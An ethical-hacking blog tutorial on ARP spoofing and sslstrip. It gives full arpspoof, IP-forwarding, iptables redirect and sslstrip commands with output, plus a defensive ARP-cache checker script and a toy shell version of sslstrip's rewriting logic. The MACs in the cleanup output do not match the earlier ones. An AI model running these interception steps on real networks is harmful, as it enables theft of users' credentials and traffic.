
Ethical Hacking Fridays: How to Hack (Part 10) ARP Spoofing and SSL Strip
ARP Spoofing
As a network architect, I can’t emphasise enough the need to implement the necessary security precautions at layer 2. I’ve seen so many networks where layer-2 is just implemented as standard. You really should be looking at 802.1X port authentication, DHCP snooping with Dynamic ARP Inspection (DAI) so the switch drops ARP replies that do not match a known IP-to-MAC binding, and private VLANs as a minimum. Don’t just implement a basic layer-2 network with no additional security or you will regret it.
For this tutorial, I’m going to use my test victim machine on 192.168.1.1. In the real world you may not know the IP address of the victim. Using a tool called the Network Mapper (“nmap”) you can carry out a network scan and detect most if not all the devices on the segment.
Before we get to that we should find out what the default gateway (router) is on the network. We can see it is 192.168.1.254.
root@kali:~# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.1.254 0.0.0.0 UG 100 0 0 eth0
192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
We can also see that my Kali instance is running on 192.168.1.2.
root@kali:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:24:30:b1 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.2/24 brd 192.168.1.255 scope global noprefixroute eth0
valid_lft forever preferred_lft forever
We will want to exclude the router and ourselves from the scan in order to save time.
root@kali:~# nmap 192.168.1.1,3-253 -vv
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-20 10:49 BST
Initiating ARP Ping Scan at 10:49
Scanning 252 hosts [1 port/host]
This can take some time, but it will return the live hosts on the segment and the ports they are listening on. You can add further options if you want, for example service or OS detection.
In the real world you wouldn’t have access to the victim machine, but just for interest’s sake let’s look at the current normal state.
% arp 192.168.1.254
? (192.168.1.254) at e8:ad:a6:d0:44:b1 on en1 ifscope [ethernet]
We can see that the victim currently thinks the router MAC is e8:ad:a6:d0:44:b1 which it is.
We can also do a traceroute externally to 8.8.8.8; the next hop is the router.
% traceroute 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 64 hops max, 52 byte packets
1 192.168.1.254 (192.168.1.254) 1.407 ms 1.072 ms 1.081 ms
So that all looks good so far…
Now let’s hop back over to our Kali instance. We are going to run “arpspoof”, giving it the interface “eth0”, the victim IP “192.168.1.1” as the target (-t), and the default gateway “192.168.1.254” with -r, which poisons both hosts: the victim is told the gateway is at our MAC and the gateway is told the victim is at our MAC, so we sit in the middle of both directions. As long as this is running the ARP attack is happening; arpspoof keeps re-sending the forged replies every couple of seconds so the caches never recover on their own.
root@kali:~# arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.254
8:0:27:24:30:b1 28:f0:76:45:c1:2a 0806 42: arp reply 192.168.1.254 is-at 8:0:27:24:30:b1
8:0:27:24:30:b1 e8:ad:a6:d0:44:b1 0806 42: arp reply 192.168.1.1 is-at 8:0:27:24:30:b1
8:0:27:24:30:b1 28:f0:76:45:c1:2a 0806 42: arp reply 192.168.1.254 is-at 8:0:27:24:30:b1
8:0:27:24:30:b1 e8:ad:a6:d0:44:b1 0806 42: arp reply 192.168.1.1 is-at 8:0:27:24:30:b1
8:0:27:24:30:b1 28:f0:76:45:c1:2a 0806 42: arp reply 192.168.1.254 is-at 8:0:27:24:30:b1
Let’s look what is happening on the victim…
% arp 192.168.1.254
? (192.168.1.254) at 8:0:27:24:30:b1 on en1 ifscope [ethernet]
Well this isn’t good!
The victim machine now thinks the MAC of the default gateway router is 8:0:27:24:30:b1. The actual default gateway is e8:ad:a6:d0:44:b1.
% traceroute 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 64 hops max, 52 byte packets
1 192.168.1.2 (192.168.1.2) 0.447 ms 0.267 ms 0.198 ms
You can see now that all traffic is routing to my Kali instance first.
On its own this isn’t much use: a Linux host does not forward packets by default, so traffic that arrives addressed to another IP is simply dropped, and the victim’s connections stall at hop 1 as the traceroute shows.
In order for this to work we need to configure Kali as a router so it can forward packets.
root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
Now let’s try the traceroute again from our victim…
% traceroute 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 64 hops max, 52 byte packets
1 192.168.1.2 (192.168.1.2) 0.447 ms 0.267 ms 0.198 ms
2 192.168.1.254 (192.168.1.254) 1.371 ms 1.164 ms 1.227 ms
Traffic from my victim is now routing via my Kali instance and aside from it being slightly slower it is hardly noticeable.
Just for interest’s sake, if you want to stop the ARP spoofing attack press Ctrl+C and “arpspoof” will clean up automatically, sending a final round of ARP replies carrying the real MAC addresses so the victim and the router go back to normal.
^CCleaning up and re-arping targets...
8:0:27:24:30:b1 28:f0:76:45:c1:2a 0806 42: arp reply 192.168.1.254 is-at e8:ad:a6:e0:45:a1
8:0:27:24:30:b1 e8:ad:a6:d0:44:b1 0806 42: arp reply 192.168.1.1 is-at 28:f0:76:46:d1:3a
8:0:27:24:30:b1 28:f0:76:45:c1:2a 0806 42: arp reply 192.168.1.254 is-at e8:ad:a6:e0:45:a1
8:0:27:24:30:b1 e8:ad:a6:d0:44:b1 0806 42: arp reply 192.168.1.1 is-at 28:f0:76:46:d1:3a
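Since the post opens by saying layer-2 defences are what stop this, here is the check a defender (or anyone auditing a lab segment) would want. It is an added example, not part of the original post: a small script that parses an arp -a dump of the kind the victim printed and flags the two symptoms just shown, the gateway moving away from its known-good MAC and one MAC answering for more than one IP. The addresses are the ones used in this tutorial; the dump lines are constructed to reproduce the poisoned cache rather than captured from a host, and padding unpadded BSD-style MAC octets so they compare with Linux-style ones is an assumption made for the example.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post: check an `arp -a` dump
# from the victim for the two symptoms of the attack walked through above.
# The IPs and MACs below are the ones the tutorial uses; the dump lines are
# constructed to reproduce the poisoned state, not captured from a real host.

GATEWAY_IP="192.168.1.254"
GATEWAY_MAC="e8:ad:a6:d0:44:b1"   # known-good router MAC recorded before the attack

# BSD/macOS `arp -a` prints unpadded octets (8:0:27:...), Linux pads them
# (08:00:27:...). Normalise to padded lower-case so the two compare equal.
norm_mac() {
    printf '%s\n' "$1" | tr 'A-F' 'a-f' | awk -F: '{
        for (i = 1; i <= NF; i++) {
            o = $i; if (length(o) == 1) o = "0" o
            printf "%s%s", (i > 1 ? ":" : ""), o
        }
        print ""
    }'
}

# Parse "? (ip) at mac on iface ..." lines into "ip mac" pairs.
arp_pairs() {
    sed -n 's/^? (\([0-9.]*\)) at \([0-9a-fA-F:]*\) .*/\1 \2/p' "$1" |
    while read -r ip mac; do
        printf '%s %s\n' "$ip" "$(norm_mac "$mac")"
    done
}

# Print one ALERT line per finding; return the number of findings (0 = clean).
check_arp_cache() {
    local dump="$1" pairs expected_gw gw_mac dups findings=0
    pairs=$(arp_pairs "$dump")
    expected_gw=$(norm_mac "$GATEWAY_MAC")

    # Symptom 1: the gateway entry no longer carries the known-good MAC.
    gw_mac=$(printf '%s\n' "$pairs" | awk -v ip="$GATEWAY_IP" '$1 == ip { print $2 }')
    if [ -n "$gw_mac" ] && [ "$gw_mac" != "$expected_gw" ]; then
        echo "ALERT gateway $GATEWAY_IP is at $gw_mac, expected $expected_gw"
        findings=$((findings + 1))
    fi

    # Symptom 2: one MAC answering for more than one IP. With `arpspoof -r`
    # the attacker's NIC claims both the router and the victim, so a cache
    # that holds both entries shows the same MAC twice.
    dups=$(printf '%s\n' "$pairs" | awk '
        { ips[$2] = ips[$2] " " $1; n[$2]++ }
        END { for (m in n) if (n[m] > 1) print m ":" ips[m] }')
    if [ -n "$dups" ]; then
        echo "ALERT one MAC claims several IPs -> $dups"
        findings=$((findings + 1))
    fi
    return "$findings"
}

# Constructed sample: the victim's cache while arpspoof ran, plus the
# attacker's own entry so the duplicate-MAC check has something to find.
poisoned=$(mktemp)
cat > "$poisoned" <<'EOF'
? (192.168.1.2) at 8:0:27:24:30:b1 on en1 ifscope [ethernet]
? (192.168.1.254) at 8:0:27:24:30:b1 on en1 ifscope [ethernet]
EOF

if check_arp_cache "$poisoned"; then
    echo "cache looks clean"
else
    echo "cache is poisoned"
fi
rm -f "$poisoned"
```

Run it periodically against a real arp -a (or ip neigh, after adjusting the sed pattern) on a host you care about; a baseline MAC for the gateway is the one thing you must record before the attack, which is also why DAI on the switch is the better control.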
So all traffic is now routing via our Kali instance. Today most sites use HTTPS (TLS), so what passes through Kali won’t be very interesting beyond which sites the victim visits: DNS lookups and the server name in the TLS handshake (SNI) are still in the clear, but the content is not. What an attacker wants is a way to get at that traffic in plaintext, and sitting in the middle of the connection is where to try.
This is where the tool “sslstrip” comes into play. Please note that browsers now have preventative measures against this, chiefly HTTP Strict Transport Security (HSTS): once a browser has seen a site’s HSTS header, or has the site on its built-in preload list, it will not make the plain-HTTP request that sslstrip depends on. So the victim would need to be using an old or non-standard browser, or visiting a site that has not deployed HSTS. I mean it is highly unlikely Chrome and Firefox will return any results these days. I have not tried Safari or Internet Explorer but maybe they would. You would mainly be targeting poorly maintained IT infrastructure or devices that have not been properly looked after.
SSL Strip
If you have tried to install SSL Strip in Kali from 2020 onwards you’ll notice it is not a trivial task. You will probably find yourself working through error after error and still not get it working. I managed to get it working as follows.
- Clone SSL Strip from the Github repo
root@kali:~# apt install git -y
Reading package lists... Done
Building dependency tree
Reading state information... Done
git is already the newest version (1:2.28.0-1).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@kali:~# git clone https://github.com/moxie0/sslstrip
Cloning into 'sslstrip'...
remote: Enumerating objects: 42, done.
remote: Total 42 (delta 0), reused 0 (delta 0), pack-reused 42
Unpacking objects: 100% (42/42), 30.58 KiB | 1.27 MiB/s, done.
- Install Python package manager “pip”
root@kali:~# apt install python3-pip -y
Reading package lists... Done
Building dependency tree
Reading state information... Done
python3-pip is already the newest version (20.1.1-2).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
- Install Python “virtualenv” using “pip3”.
root@kali:~# pip3 install virtualenv
Requirement already satisfied: virtualenv in /usr/local/lib/python3.8/dist-packages (20.0.35)
Requirement already satisfied: six<2,>=1.9.0 in /usr/local/lib/python3.8/dist-packages (from virtualenv) (1.15.0)
Requirement already satisfied: filelock<4,>=3.0.0 in /usr/local/lib/python3.8/dist-packages (from virtualenv) (3.0.12)
Requirement already satisfied: distlib<1,>=0.3.1 in /usr/local/lib/python3.8/dist-packages (from virtualenv) (0.3.1)
Requirement already satisfied: appdirs<2,>=1.4.3 in /usr/lib/python3/dist-packages (from virtualenv) (1.4.4)
- Create your Python virtual environment using Python 2 ←
root@kali:~# virtualenv -p python2 sslstripenv
created virtual environment CPython2.7.18.final.0-64 in 111ms
creator CPython2Posix(dest=/root/sslstripenv, clear=False, global=False)
seeder FromAppData(download=False, pip=bundle, setuptools=bundle, wheel=bundle, via=copy, app_data_dir=/root/.local/share/virtualenv)
added seed packages: pip==20.2.3, setuptools==44.1.1, wheel==0.35.1
activators BashActivator,CShellActivator,FishActivator,PowerShellActivator,PythonActivator
- Load your “sslstripenv” virtual environment.
root@kali:~# . sslstripenv/bin/activate
(sslstripenv) root@kali:~#
- Go to your Git cloned “sslstrip” directory.
(sslstripenv) root@kali:~# cd sslstrip
(sslstripenv) root@kali:~/sslstrip#
- Install the following dependencies using “pip”.
(sslstripenv) root@kali:~/sslstrip# pip install Twisted pyOpenSSL service_identity
*** INSTALLATION PROCESS ***
- If all has gone to plan “sslstrip.py” should run now.
(sslstripenv) root@kali:~/sslstrip# python sslstrip.py -h
/root/sslstripenv/lib/python2.7/site-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
from cryptography import x509
sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>
Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
You can ignore that warning: “sslstrip” 0.9 only works with Python 2 these days. If you try to use Python and/or pip version 3 you will open a Pandora’s box of issues. The way round it is to create a Python 2 virtual environment, as above, and then it works.
In case you are not familiar with Python virtual environments the way you exit is type “deactivate”.
(sslstripenv) root@kali:~/sslstrip# deactivate
root@kali:~/sslstrip#
If you want to enter again you do as follows.
root@kali:~/sslstrip# cd
root@kali:~# . sslstripenv/bin/activate
(sslstripenv) root@kali:~# cd sslstrip
(sslstripenv) root@kali:~/sslstrip# python sslstrip.py -h
Basic Usage
“sslstrip” listens on a port of its own (10000 by default; we will use TCP 8080), so we need an “iptables” rule that catches the victim’s plain HTTP traffic on TCP 80 as it is forwarded through Kali and redirects it to that port. Note that it is port 80, not 443, that is redirected: sslstrip never touches a connection that is already HTTPS. It works on the HTTP request the browser makes first and on the redirect that would normally upgrade it.
root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
And let’s verify it is there…
root@kali:~# iptables -t nat -L -v -n
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
root@kali:~# iptables -t nat -L PREROUTING
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:http redir ports 8080
“sslstrip” is a transparent HTTP proxy. It forwards the victim’s requests to the real server and, in the responses, rewrites every https:// link and Location redirect to http://, so the browser never opens a secure connection itself. It keeps track of which URLs it rewrote; when the victim follows one, sslstrip makes the HTTPS connection to the server on the victim’s behalf and relays what the browser sent in the clear. The server sees a normal TLS session, the victim sees plain HTTP, and anything POSTed (logins in particular) passes through sslstrip in plaintext, which is what it logs.
You then need to run “sslstrip” on the configured port, which in our case is TCP 8080.
(sslstripenv) root@kali:~/sslstrip# python sslstrip.py -l 8080
/root/sslstripenv/lib/python2.7/site-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
from cryptography import x509
sslstrip 0.9 by Moxie Marlinspike running...
Now, provided ARP spoofing is directing the victim’s traffic through your Kali instance, the iptables rule is in place, sslstrip is running, and the victim’s browser is not protected by HSTS for the site in question, any visit that starts as plain HTTP and would normally be redirected to HTTPS will be stripped and logged here. When you are finished, remember to delete the REDIRECT rule from the nat PREROUTING chain and set ip_forward back to 0; arpspoof’s Ctrl+C cleanup only restores the ARP caches.
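To make the rewrite concrete, here is a toy re-implementation in shell of the two things sslstrip does, added for this write-up and not sslstrip’s own code: rewriting https:// links and Location redirects in a server response to http://, and remembering which URLs were stripped so the matching request from the victim is sent upstream over HTTPS. It also includes a check for the Strict-Transport-Security header, which is the browser-side defence mentioned earlier. The response, the host www.example.test, the paths and the state file are all constructed for the example; real sslstrip additionally handles compressed bodies, cookies and logging, which this leaves out.

```shell
#!/usr/bin/env bash
# Added example for this write-up, not code from sslstrip: a toy version of
# the strip-and-remember logic described above, run over a constructed HTTP
# response. Host names, paths and the state file are made up for the demo.

# Hosts/paths we have already stripped. The victim will request these over
# plain HTTP, and we must fetch them from the server over HTTPS instead.
STATE="${STATE:-$(mktemp)}"

# Rewrite a server response (headers and body on stdin) the way sslstrip does:
# every https:// URL handed to the victim becomes http://, and each one is
# recorded so the follow-up request can be upgraded again on the way out.
strip_response() {
    local resp
    resp=$(cat)
    # Remember host/path of every secure link, Location headers and body alike.
    printf '%s\n' "$resp" \
        | grep -o "https://[^\"'<>[:space:]]*" \
        | sed 's#^https://##' >> "$STATE"
    # What the victim's browser receives: plain-HTTP links only.
    printf '%s\n' "$resp" | sed 's#https://#http://#g'
}

# Given the host/path of a request the victim sent us over HTTP, return the
# URL we contact upstream. If we stripped it earlier, go back to HTTPS so the
# server sees a normal TLS session while the victim still sees plaintext.
upstream_url() {
    local hostpath="$1"
    if grep -qxF "$hostpath" "$STATE"; then
        printf 'https://%s\n' "$hostpath"
    else
        printf 'http://%s\n' "$hostpath"
    fi
}

# The caveat from the text: if the browser already knows the site through
# HSTS (an earlier visit or the preload list) it never sends the plain-HTTP
# request we depend on. This spots the header in a response, so you can tell
# from a capture whether a site would have protected a returning visitor.
has_hsts() {
    grep -qi '^strict-transport-security:'
}

# Constructed sample: a login redirect of the kind sslstrip targets.
response=$(cat <<'EOF'
HTTP/1.1 302 Found
Location: https://www.example.test/login
Set-Cookie: session=abc123; Path=/; Secure
Content-Type: text/html

<a href="https://www.example.test/login">Sign in</a>
EOF
)

echo "--- response as the victim sees it ---"
printf '%s\n' "$response" | strip_response
echo "--- upstream URL when the victim follows the link ---"
upstream_url "www.example.test/login"
echo "--- upstream URL for a path that was never stripped ---"
upstream_url "www.example.test/about"
```

The state file is the whole trick: without it the proxy would not know that the victim’s http://www.example.test/login must be fetched over TLS, and the server would either refuse or redirect again. It is also the weak point, since a browser that already holds an HSTS entry for the host never sends that first http:// request at all.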
A good idea is to open another terminal window and “tail” the “sslstrip” log file. This lets you view the results without interrupting the tool.
root@kali:~/sslstrip# tail -f -n 0 sslstrip.log